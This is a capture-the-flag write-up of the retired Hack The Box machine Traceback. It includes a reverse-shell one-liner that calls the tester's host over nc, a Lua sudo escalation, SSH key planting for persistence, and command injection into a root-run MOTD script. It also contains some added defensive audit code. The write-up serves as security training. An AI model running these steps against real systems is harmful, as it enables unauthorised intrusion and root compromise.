
Hackthebox.eu - Retired - Traceback



Recon

As is my normal routine, I start with a simple up/down scan of all TCP ports


$ nmap -T4 -p- -oX ./nmapb.xml traceback.htb


Then I convert that to HTML to make it pretty


$ xsltproc ./nmapb.xml -o ./nmapb.html



Just three open ports: 22, 80 and 8080


Let's scan again with the -A switch to try and fingerprint the OS and services


$ nmap -T4 -p22,80,8080 -A -oX ./nmapf.xml traceback.htb


Then I convert that to HTML also

$ xsltproc ./nmapf.xml -o ./nmapf.html



Port 22 is a fairly recent OpenSSH

80 is Apache

8080 is something strange…


Let's see what we find on port 80



Looks like somebody has defaced the site




But they left us a backdoor? I think it might have something to do with port 8080, but let's run dirb just in case

Trying to browse to port 8080 we get nothing


What about this part of our nmap output?


Googling around for http-proxy socks5, I eventually found this page

https://www.systutorials.com/proxy-using-ssh-tunnel/


It talks about setting up an SSH proxy



What happens if we try to SSH into port 80?




Cool there is SSH there…

What was the hacker's name again?



Oh yeah, it's right there in the screenshot


XH4H


Dirb wasn't very helpful


But this line in the page source looks like a thread we should pull



I popped that into Google and found this GitHub repo


https://github.com/TheBinitGhimire/Web-Shells









I wonder if these shells might be what the hacker meant when they said they left a backdoor


I just copied and pasted each filename into the URL to see if it existed in the web root…


After almost exhausting the list we got this


Looking at the code for this shell, the default creds are admin/admin



Let's try it



Yup


While I haven't technically exploited the system yet, let's move over to the exploitation section or I'm going to feel dirty




Exploit



OK, so we got a shell. Cool.



Let's poke around the OS and see what we can find


Here is the bash history for webadmin






Lua




https://www.lua.org/




Here is sudo -l


Webadmin can run this luvit application as sysadmin with no password



Let's grab a better shell than this PHP webshell



Let's listen on 5555 on our Kali box


And run this mkfifo reverse shell one-liner from the web shell



rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.42 5555 >/tmp/f





Let's see what that application we found earlier does

$ sudo -u sysadmin /home/sysadmin/luvit



Googling around for luvit lands us here

https://luvit.io/


Using the Node-Style APIs

The luvit CLI tool can be used as a scripting platform just like node. This can be used to run lua scripts as standalone servers, clients, or other tools.

That sounds really interesting. I wonder if we can use a Lua script to get a shell as sysadmin…


The easiest thing I can think of is a Lua script that just spawns a new shell as sysadmin


I created a Lua script with this inside


os.execute('/bin/sh')


Then I used Python's SimpleHTTPServer and wget to move it over to Traceback


On Kali

/Desktop/HTB/traceback$ python -m SimpleHTTPServer 8080

On Traceback

$ wget http://10.10.14.30:8080/Esc.lua


Then we use sudo to call the file Esc.lua as sysadmin


sudo -u sysadmin /home/sysadmin/luvit /tmp/circusmonkey/Esc.lua
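An added defensive check, not part of the original write-up: a small Python audit that parses `sudo -l` style output and flags entries like the one above, where a script runtime such as luvit can be run as another user with no password from a path under /home. The sample output is constructed to mirror the box, since the real output only appeared as a screenshot.

```python
import re

# Constructed sample of `sudo -l` output, modelled on the Traceback entry.
SAMPLE_SUDO_L = """\
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit
    (root) /usr/bin/apt-get update
"""

# Runtimes that execute arbitrary scripts: granting one of these via sudo is
# effectively granting a shell as the run-as user.
INTERPRETERS = {"luvit", "lua", "python", "python3", "perl", "ruby", "node", "sh", "bash"}

# One privilege line: "(runas) TAG: TAG: /path/to/command args"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$")


def audit_sudo_l(output):
    """Parse `sudo -l` output and return one finding dict per risky entry.

    Flags NOPASSWD entries, commands under /home (a user-controlled location),
    commands whose basename is a known script interpreter, and bare ALL.
    """
    findings = []
    for line in output.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas, cmd = m.group("runas"), m.group("cmd")
        tags = m.group("tags").replace(":", "").split()
        reasons = []
        if "NOPASSWD" in tags:
            reasons.append("no password required")
        if cmd.startswith("/home/"):
            reasons.append("command lives under /home (user-writable location)")
        if cmd.split()[0].rsplit("/", 1)[-1] in INTERPRETERS:
            reasons.append("script interpreter: arbitrary code runs as the run-as user")
        if cmd == "ALL":
            reasons.append("any command allowed")
        if reasons:
            findings.append({"runas": runas, "cmd": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"({f['runas']}) {f['cmd']}: " + "; ".join(f["reasons"]))
```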



Alright alright alright




Let's get our user hash




cat user.txt

c24349701ae38c33ffbf0cceb2c46020


I created a new folder under /tmp (because I'm too lazy to deal with the permissions on the folder we created as the webadmin user)


mkdir /tmp/circusmonkey2


Let's use SimpleHTTPServer to transfer LinEnum.sh over to Traceback to see if we can find any misconfigurations




We need to give this script execution rights


chmod +x ./LinEnum.sh




This part of the running processes caught my attention



Looks like there is a process running as root that copies everything from /var/backups/.update-motd.d to /etc/update-motd.d


This looks like a process that is meant to keep the /etc/update-motd.d folder from being messed with.


Every 30 seconds it restores the files to the version that was backed up


MOTD… That brings me back to my net admin days, setting the MOTD banner on Cisco IOS…



MOTD stands for Message of the Day. This is a message that can be displayed on an SSH or telnet session (among other services). There can be a couple of different banners: a warning banner that is displayed pre-authentication, and another that you see after you authenticate.




Let's check out the folder that is being overwritten



Ooooooohhhhhh, the sysadmin group has write access to this….

Let's check out the 00-header file



See that last part


Welcome to Xh4Hland
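An added example (not from the write-up) of how a defender would catch this configuration: a Python check over /etc/update-motd.d that flags scripts writable by non-root users and compares each one against its copy in /var/backups/.update-motd.d, so an appended command is reported even before the restore loop reverts it. The demo() scenario is constructed in a temporary directory; the two paths are taken from the write-up.

```python
import filecmp
import os
import stat
import tempfile

# Paths from the write-up, parameterised so the check can run anywhere.
MOTD_DIR = "/etc/update-motd.d"
BACKUP_DIR = "/var/backups/.update-motd.d"


def audit_motd_dir(motd_dir=MOTD_DIR, backup_dir=BACKUP_DIR):
    """Return (filename, issue) tuples for MOTD scripts a non-root user could
    change or whose content no longer matches the backed-up copy. These scripts
    run as root on every SSH login, so write access to them is root code
    execution; a periodic restore only shortens the window."""
    issues = []
    for name in sorted(os.listdir(motd_dir)):
        path = os.path.join(motd_dir, name)
        st = os.stat(path)  # follows symlinks, so a link to a user file is caught by uid
        if st.st_uid != 0:
            issues.append((name, f"owned by uid {st.st_uid}, not root"))
        if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
            issues.append((name, f"writable by gid {st.st_gid}"))
        if st.st_mode & stat.S_IWOTH:
            issues.append((name, "world-writable"))
        backup = os.path.join(backup_dir, name)
        if not os.path.isfile(backup):
            issues.append((name, "no backup copy: cannot verify integrity"))
        elif not filecmp.cmp(path, backup, shallow=False):
            issues.append((name, "differs from backup: possible tampering"))
    return issues


def demo():
    """Constructed scenario: a group-writable 00-header with a command appended
    (as on the box) beside an untouched 10-help script; returns the findings."""
    root = tempfile.mkdtemp()
    motd, backup = os.path.join(root, "motd"), os.path.join(root, "backup")
    for d in (motd, backup):
        os.makedirs(d)
    bodies = {"00-header": "echo 'Welcome to Xh4H land'\n", "10-help": "echo help\n"}
    for name, body in bodies.items():
        with open(os.path.join(backup, name), "w") as f:
            f.write(body)
        with open(os.path.join(motd, name), "w") as f:
            f.write(body + ("    cat /root/root.txt\n" if name == "00-header" else ""))
        os.chmod(os.path.join(motd, name), 0o664 if name == "00-header" else 0o755)
    return audit_motd_dir(motd, backup)
```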


Let's try to connect up using SSH to see if that is the message we get when we ssh in



Well that's not the same message….


Maybe our message is behind authentication. Let's put our SSH key in authorized_keys for sysadmin and see if we get a different message after we gain access.



Let's start by generating our private and public keys


$ ssh-keygen -t rsa


This makes a private and public key for us..


It puts the public key in the directory we ran the command from


Since this is a live box and there are other users trying to root this box.. I don't want to overwrite the authorized_keys file for sysadmin


So let's add some padding to our public key so there are a few blank lines on either side of it


$ (echo -e "\n\n"; cat ./id_rsa.pub; echo -e "\n\n") > pubkey.txt



Now we can use >> to append this to the authorized_keys file


On our shell


cd /home/sysadmin/.ssh


 echo "



ssh-rsa AA*************************************************************************************************************************************************************************************************************************************** circusmonkey@kali



" >> authorized_keys


This should put our key at the bottom of the authorized_keys file


Now let's try to ssh with our private key



And there is that string we saw in the 00-header file.



Let's edit the file to print out the root flag


cd /etc/update-motd.d


$ echo "                                                                                                                                                                                                                                          cat /root/root.txt                                                                                                                                                                                                                    " >> 00-header



Then we'll cat the file to make sure our cat command actually made it in there.




Yup, it's there. Let's open another terminal and try to SSH again



And there is our hash…. Since HTB is now rotating the hashes after every reset, I'm not going to blur out the hash anymore, since it shouldn't work by the time this goes public.


#################################

-------- OWNED BY XH4H  ---------

- I guess stuff could have been configured better ^^ -

#################################


Welcome to Xh4H land


c37bcae2b8b1cd4ed4addc68f243e1b0




